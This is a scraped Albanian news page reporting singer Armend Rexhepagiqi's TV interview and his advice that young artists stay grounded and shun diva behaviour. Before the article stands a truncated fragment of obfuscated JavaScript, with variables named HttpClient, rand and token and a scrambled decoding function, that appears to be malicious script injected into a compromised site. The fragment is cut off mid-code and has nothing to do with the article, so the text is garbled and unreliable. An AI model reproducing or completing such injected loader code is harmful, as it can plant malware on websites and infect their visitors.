;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Nga intervista e Armend Rexhepagiqit: Ja nja dy gjëra “kruciale” që ua mësoi artistëve të rinj (VIDEO)

By

Javën e kaluar, ai ishte I ftuari i Alaudin Hamitit në emisionin Nd’rrimi i Natës në Klan Kosova.

Dhe gjatë intervistës së tij, Armend Rexhepagiqi tha gjëra tejet interesante dhe premtoi kthimin në muzikë me këngë të tijat.

Madje, ai la ca porosi të bukura edhe për artistët e rinj!

Si njëri nga kantautorët më të famshëm e më të vlerësuar shqiptarë, ai tha se njeriu pavarësisht famës dhe popullaritetit, duhet të mësojë të rrijë me këmbë në tokë.

“Nëse je njeri normal, ngopesh nga skena, nëse nuk ngopesh nuk je normal. Nuk arrij ta kuptoj se si disa nuk duan ikje prej skenës”, thotë Armendi, i cili thekson se nuk është e nevojshme që gjithmonë të jesh prezent në publik.

Ai madje thekson, se kur je i famshëm duhet të mësosh të jesh me këmbë në tokë!

“Artistët i dua kur janë si njerëz stabilë e stabilitetin e kërkojmë të gjithë tërë jetën. Unë nuk pranoj sjellje të divës, nuk i dua kapriçot dhe pasaktësinë. Nëse kërkon të hysh në një projekt dhe i ndërron kushtet, nuk më pëlqen. E dua normalitetin dhe njeriun që është me dy këmbë në tokë”.

Artikuj të ngjashëm